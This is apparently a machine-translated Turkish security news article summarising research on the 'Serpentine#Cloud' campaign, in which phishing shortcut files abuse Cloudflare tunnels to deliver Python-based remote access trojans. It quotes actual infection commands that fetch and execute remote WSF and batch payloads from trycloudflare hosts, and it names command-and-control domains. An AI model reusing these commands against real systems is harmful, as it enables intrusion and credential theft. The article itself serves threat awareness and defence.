Siber suçlu taktiklerde endişe verici bir evrim gösteren çok aşamalı python tabanlı yükler sunmak için Cloudflare’nin tünel altyapısını kullanan sofistike bir kötü amaçlı yazılım kampanyası ortaya çıktı.
Serpantin#Cloud olarak izlenen kampanya, sosyal mühendislik tekniklerini Batı ülkelerinde mağdur sistemlerini tehlikeye atmak için ileri kaçaklama yöntemleriyle birleştirerek, kötü niyetli amaçlar için meşru bulut hizmetlerinin kötüye kullanılmasında önemli bir yükselmeyi temsil ediyor.
Bu kampanyanın arkasındaki tehdit aktörleri, PDF belgeleri olarak gizlenmiş kötü niyetli kısayol dosyaları içeren kimlik avı e -postalarıyla başlayan karmaşık bir enfeksiyon zinciri geliştirdi.
.png
)
Bu e-postalar genellikle fatura ile ilgili iletişim olarak maskelenerek, şüpheli olmayan kurbanları ilk yükü yürütmeye teşvik etmek için ortak iş süreçlerinden yararlanır.
Saldırganlar, anonim kalırken ve geleneksel ağ güvenlik önlemlerinden kaçarken kötü amaçlı yüklerini barındırmak ve sunmak için Cloudflare’nin geçici tünel hizmetinden, özellikle TryCloudflare.com Subdomain’den yararlanarak önemli bir karmaşıklık gösterdiler.
Securonix araştırmacıları, ABD, Birleşik Krallık, Almanya ve Avrupa ve Asya’daki diğer bölgelerdeki hedeflere güçlü bir şekilde odaklanan telemetri analizi yoluyla kampanyayı belirlediler.
Tehdit aktörleri, araç setleri boyunca gözlemlenen kod yorumlarına ve komut dosyası uygulamalarına dayanarak İngilizce olarak akıcılık göstermiştir. Atıf belirsizliğini korumaktadır, ancak kampanyanın yapısı ve hedefleme kalıpları, yaygın dağıtım için ölçeklenebilir dağıtım yöntemlerini test eden sofistike bir aktör olduğunu göstermektedir.
Kötü amaçlı yazılım etkisi, son yük, enfekte sistemlere kalıcı erişimi sürdürürken saldırganların kimlik bilgilerini, tarayıcı oturum verilerini ve hassas bilgileri çalmasını sağlayan uzaktan erişim truva özellikleri sunduğundan basit sistem uzlaşmasının ötesine uzanır.
Cloudflare’nin güvenilir altyapısının kullanımı, kötü niyetli trafiğin meşru iletişimlerle sorunsuz bir şekilde karışmasını sağlar ve bu da tespiti geleneksel güvenlik çözümleri için önemli ölçüde daha zor hale getirir.
Çok Aşamalı Enfeksiyon Zinciri: Kısayol Dosyalarından Bellek Yerleşik Kötü Yazılımlarına
Serpantin#Bulut Kampanyası, hem kullanıcı incelemesinden hem de uç nokta güvenlik çözümlerinden kaçınmak için tasarlanmış gelişmiş tradecraft sergileyen oldukça karmaşık bir çok aşamalı enfeksiyon süreci kullanır.
İlk enfeksiyon vektörü, özel simgeler ve gizli dosya uzantıları aracılığıyla meşru PDF belgeleri olarak görünmek üzere hazırlanmış .lnk uzantısına sahip kötü amaçlı Windows kısayol dosyalarına dayanır.
.webp)
Bir kurban gizlenmiş kısayol dosyasını yürüttüğünde, sonraki aşamaların indirilmesini ve yürütülmesini başlatan sofistike bir komut sırasını tetikler.
Kötü niyetli .lnk dosyası, Cloudflare tüneli alt alanlarında barındırılan uzak WebDAV paylaşımlarından yükleri almak için Windows’un yerel robocopy yardımcı programını kullanan gömülü bir komut içerir.
Kampanyada gözlenen tipik bir komut şu deseni izler: cmd.exe /c robocopy "\\flour-riding-merit-refers.trycloudflare[.]com@SSL\DavWWWRoot\RE_02WSF" %temp% tank.wsf /ns /nc /nfl /ndl >nul & start /min "" cscript.exe //nologo "%temp%\tank.wsf".
.webp)
Bu ilk aşama, ikincil bir Cloudflare alanından harici bir parti dosyasını yürütmek için tasarlanmış hafif VBScript tabanlı bir yükleyici olarak hizmet veren bir Windows komut dosyası dosyası indirir.
WSF dosyası, birincil amacı komutu kullanarak başka bir uzaktan yükü yürütmek olan minimal kod içerir: cmd.exe /c "\\depot-arrange-zero-kai.trycloudflare[.]com@SSL\DavWWWRoot\kiki.bat".
.webp)
Bu yaklaşım, analiz ve ilişkilendirme çabalarını karmaşıklaştıran birden fazla dolaylı katman oluşturur.
Sonraki toplu dosya aşaması, UTF-16LE kodlama ve dinamik değişken ikame teknikleri dahil olmak üzere birden fazla gizleme katmanı kullanan enfeksiyon zincirinin belki de en sofistike bileşenini temsil eder.
Deobfuscated Batch betiği, tuzak PDF belgelerinin dağıtılması, antivirüs yazılımı algılama, python tabanlı yükleri indirme ve Windows Startup klasör değişiklikleri aracılığıyla kalıcılık oluşturma gibi kritik işlevler gerçekleştirir.
Komut dosyası sonuçta, diske dosya yazmadan bellek sakini yüklerini yürütmek üzere erken kuş APC enjeksiyon tekniklerini uygulayan Python tabanlı bir kabuk kodu yükleyicisinin yürütülmesinde doruğa ulaşan eksiksiz python kütüphaneleri ve kötü amaçlı komut dosyaları içeren zip dosyalarını indirir ve çıkarır.
Son aşama, uzaktan erişim truva atları olarak işlev gören, nhvncpure.shop, nhvncpure.sbs ve çeşitli dinamik DNS hizmetleri dahil olmak üzere birden fazla alanda barındırılan altyapı ile komut ve kontrol iletişimi oluşturan donut dolu PE yükleri sunar.
Tüm enfeksiyon zinciri, uzlaşmış sistemlere uzun vadeli erişimi sürdürürken tespit etmekten kaçınmak için meşru araçlar, şifreli iletişim ve yalnızca bellek yürütme kullanımında kayda değer bir karmaşıklık gösterir.
Herhangi biriyle erken tehdit tespiti, yükseltme ve hafifletme güçlendirin. 50 deneme araması alın.